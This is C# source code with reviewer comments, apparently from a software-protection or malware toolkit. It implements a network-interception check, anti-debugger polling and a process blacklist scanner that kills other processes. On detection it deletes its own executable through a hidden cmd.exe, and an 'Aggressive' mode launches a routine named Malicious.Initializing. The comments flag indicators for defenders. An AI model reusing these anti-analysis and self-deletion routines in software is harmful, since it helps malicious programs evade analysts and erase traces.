/// <summary>
/// Check for sniffers: issues one HTTPS GET to google.com and treats any outcome other
/// than HTTP 200 (including any exception) as a detection.
/// </summary>
/// <remarks>
/// On detection the method optionally shows an alert (ShowAlert), optionally spawns a hidden
/// cmd.exe that deletes this executable after a short ping delay (SelfDelete), and then kills
/// <paramref name="CurrentProcess"/>.
/// ShowAlert, AlertMessage, SelfDelete, Alert and ValidationCallback are declared outside this block.
/// NOTE(review): the interception check itself presumably lives in ValidationCallback (e.g. rejecting
/// a certificate substituted by a TLS-inspecting proxy) - confirm against its definition.
/// </remarks>
/// <param name="CurrentProcess">Process whose main module path is deleted (when SelfDelete is set) and which is killed on detection.</param>
public static void Parse(Process CurrentProcess)
{
    try
    {
        // Static, process-wide setting: affects every ServicePointManager-based request, not just this one.
        ServicePointManager.CheckCertificateRevocationList = true;
        HttpWebRequest request = WebRequest.Create("https://google.com") as HttpWebRequest;
        // All three timeouts are 10 seconds (values are in milliseconds).
        request.Timeout = 10000;
        request.ContinueTimeout = 10000;
        request.ReadWriteTimeout = 10000;
        request.KeepAlive = true;
        // Hard-coded browser-like headers; the fixed Firefox/75.0 User-Agent on a .NET HTTP stack
        // is a stable string for network-side matching.
        request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0";
        request.Host = "www.google.com";
        request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
        request.Method = "GET";
        // Per-request certificate validation override; its logic is not visible in this block.
        request.ServerCertificateValidationCallback = ValidationCallback;
        using (HttpWebResponse response = request.GetResponse() as HttpWebResponse)
        {
            if (response.StatusCode == HttpStatusCode.OK)
            {
                // 200 OK: nothing detected, just release the response.
                response.Close();
            }
            else
            {
                // Any non-200 status is handled as a detection.
                response.Close();
                if (ShowAlert)
                {
                    Alert.Show(AlertMessage);
                }
                if (SelfDelete)
                {
                    string location = CurrentProcess.MainModule.FileName;
                    // Delayed self-deletion: a hidden cmd.exe pings 1.1.1.1 once with a 3000 ms wait
                    // (used as a delay so this process can exit first), then deletes the executable.
                    // The resulting process tree (this binary -> cmd.exe "/C ping ... > Nul & Del <own path>")
                    // is a useful endpoint-telemetry indicator.
                    Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose();
                    CurrentProcess.Kill();
                    Environment.Exit(0);
                }
                CurrentProcess.Kill();
            }
        }
    }
    catch
    {
        // Catch-all: every exception raised above (timeout, DNS or connection failure, certificate
        // validation failure, a null request/response from the 'as' casts) takes the same path as a
        // detection, so an offline or filtered host also triggers alert / self-delete / kill.
        if (ShowAlert)
        {
            Alert.Show(AlertMessage);
        }
        if (SelfDelete)
        {
            string location = CurrentProcess.MainModule.FileName;
            // Same hidden cmd.exe delayed-delete command as in the non-200 branch.
            Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose();
            CurrentProcess.Kill();
            Environment.Exit(0);
        }
        CurrentProcess.Kill();
    }
}
/// <summary>
/// Start the anti debugger service: polls for an attached debugger roughly every 200 ms and
/// reacts according to the ShowAlert, Aggressive and SelfDelete settings.
/// </summary>
/// <remarks>
/// Two checks run on each pass: CheckRemoteDebuggerPresent on the current process handle, then
/// Debugger.IsAttached / Debugger.IsLogging(). The loop repeats only while KeepAlive is true.
/// Declared <c>async void</c>, so callers cannot await it or observe exceptions it throws.
/// isDebuggerPresent, ShowAlert, AlertMessage, Aggressive, SelfDelete, KeepAlive, Alert,
/// CheckRemoteDebuggerPresent and Malicious.Initializing are declared outside this block.
/// </remarks>
/// <param name="CurrentProcess">Process whose main module path is deleted and which is killed in the SelfDelete branch.</param>
public static async void Start(Process CurrentProcess)
{
    for (; ;)
    {
        // presumably a P/Invoke of the Win32 API of the same name - confirm against its declaration.
        // The result is written into the shared isDebuggerPresent field via ref.
        CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
        if (isDebuggerPresent)
        {
            if (ShowAlert)
            {
                Alert.Show(AlertMessage);
            }
            if (Aggressive)
            {
                // Aggressive mode: runs Malicious.Initializing on a background thread and stops polling.
                // NOTE(review): the body of Malicious.Initializing is not visible here; review it
                // separately to learn what the aggressive response actually does.
                new Thread(new ThreadStart(Malicious.Initializing)) { IsBackground = true }.Start();
                return;
            }
            if (!Aggressive)
            {
                // This branch does not consult SelfDelete; the process is killed without the delete step.
                Process.GetCurrentProcess().Kill();
            }
        }
        // Managed-debugger checks from System.Diagnostics.
        if (Debugger.IsAttached || Debugger.IsLogging())
        {
            if (ShowAlert)
            {
                Alert.Show(AlertMessage);
            }
            if (Aggressive)
            {
                new Thread(new ThreadStart(Malicious.Initializing)) { IsBackground = true }.Start();
                return;
            }
            else if (SelfDelete)
            {
                string location = CurrentProcess.MainModule.FileName;
                // Delayed self-deletion: hidden cmd.exe waits via a single ping (3000 ms timeout) and
                // then deletes this executable. The cmd.exe child with "ping ... > Nul & Del <own path>"
                // is an endpoint-telemetry indicator.
                Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose();
                CurrentProcess.Kill();
                Environment.Exit(0);
            }
            if (!Aggressive)
            {
                Process.GetCurrentProcess().Kill();
            }
        }
        // Poll interval between passes.
        await Task.Delay(200);
        if (!KeepAlive)
        {
            // Single-shot mode: one pass only.
            break;
        }
    }
}
/// <summary>
/// Enumerates all running processes roughly every 500 ms and compares each one's main window
/// title and process name against WhiteList and BlackList using substring matching.
/// </summary>
/// <remarks>
/// A whitelisted process is skipped. A process flagged as Detected is killed, after which this
/// method optionally shows an alert, optionally schedules deletion of its own executable, and
/// kills its own process. The loop repeats only while KeepAlive is true.
/// Declared <c>async void</c>, so callers cannot await it or observe exceptions it throws
/// (for example from process.Kill() or from reading properties of an exited process).
/// Processes, Detected, WhiteListed, WhiteList, BlackList, IgnoreCase, ShowAlert, AlertMessage,
/// SelfDelete, KeepAlive and Alert are declared outside this block and are shared static state.
/// </remarks>
private static async void ScanProcess()
{
    for (;;)
    {
        Processes = null;
        Processes = Process.GetProcesses();
        foreach (Process process in Processes)
        {
            // Flags are reset per process; they are shared fields, not locals.
            Detected = false;
            WhiteListed = false;
            foreach (var nameWhite in WhiteList)
            {
                if (IgnoreCase)
                {
                    // Only the process strings are lower-cased; the list entry is used as-is.
                    // presumably WhiteList entries are stored in lower case - verify where the list is built.
                    WhiteListed = (process.MainWindowTitle.ToLower().Contains(nameWhite) || process.ProcessName.ToLower().Contains(nameWhite));
                    if (WhiteListed)
                    {
                        break;
                    }
                }
                else
                {
                    WhiteListed = (process.MainWindowTitle.Contains(nameWhite) || process.ProcessName.Contains(nameWhite));
                    if (WhiteListed)
                    {
                        break;
                    }
                }
            }
            if (WhiteListed)
            {
                continue;
            }
            foreach (string nameBlack in BlackList)
            {
                // Both branches break unconditionally after the first comparison, so as written
                // only the first BlackList entry enumerated is compared for each process.
                if (IgnoreCase)
                {
                    Detected = (process.MainWindowTitle.ToLower().Contains(nameBlack) || process.ProcessName.ToLower().Contains(nameBlack));
                    break;
                }
                else
                {
                    Detected = (process.MainWindowTitle.Contains(nameBlack) || process.ProcessName.Contains(nameBlack));
                    break;
                }
            }
            if (Detected)
            {
                // Terminates the matched (other) process first.
                process.Kill();
                if (ShowAlert)
                {
                    Alert.Show(AlertMessage);
                }
                if (SelfDelete)
                {
                    // NOTE(review): Process.MainModule and Process.Kill() are instance members, so a static
                    // member named Process (presumably holding the current process) must exist in the
                    // enclosing class - not visible here, confirm.
                    string location = Process.MainModule.FileName;
                    // Delayed self-deletion: hidden cmd.exe waits via a single ping (3000 ms timeout) and
                    // then deletes this executable. The cmd.exe child with "ping ... > Nul & Del <own path>"
                    // is an endpoint-telemetry indicator.
                    Process.Start(new ProcessStartInfo("cmd.exe", "/C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"" + location + "\"") { WindowStyle = ProcessWindowStyle.Hidden }).Dispose();
                    Process.Kill();
                    Environment.Exit(0);
                }
                Process.Kill();
            }
        }
        // Poll interval between full process-list scans.
        await Task.Delay(500);
        if (!KeepAlive)
        {
            // Single-shot mode: one scan only.
            break;
        }
    }
}